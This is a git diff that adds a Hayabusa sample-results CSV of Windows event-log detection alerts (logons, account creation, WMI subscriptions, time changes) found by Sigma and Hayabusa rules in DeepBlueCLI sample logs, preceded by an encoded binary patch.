zihKV02e|eYCp)c#sfaj%gP2WT>7RlYH1l8;t~>oSNPQWi%U>8h&Smz|J{Zq}G5Xi+ zJuh6x=lL6p2(?lboY%WrvCrlMvrlB_SQ~)js*~>`zWB2HRTYORuY2=Ev|b7cuZKj7 zx<9h{FY5{jL<{iW_SN7j%S`7-p<_V+0FeJ%e*ZhADP(KoWNhQ4tK@EH?5O<@4VRPr zcLv+BxnN&E*_nR~H1xkQNckBfx(>!xj`Vc@xc^T=LW}+Tj~{}FA405uBOC$)0C2OS z|1VlsTL()6TU*P2l>Hz1WIMjNiT@OZ1r7iJ|8IPNApgndUpf5GN*E87=}`S-)0YGQ zfc-aOH<*7CJ36^r89V-`hF^)u`7!*IX-)7ydu|f-pQKJ^#@5F4|GYE)CkBSCNA2{L zpa7G@TmTsVRyG~(|Eaj6nX$2xBmF-g|B*`_g8w`;8Zbcq3+9hl|Mf~31^q`iI-2P_ z7#k@%Ihfm+{>O&=yNmr-4l~;j0RNZ6{hwXd9D Nek4zK_zyq-zW_*CdF=oI literal 0 HcmV?d00001 
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
new file mode 100644
index 00000000..59d94e55
--- /dev/null
+++ b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
@@ -0,0 +1,14207 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 
+09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: 
IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 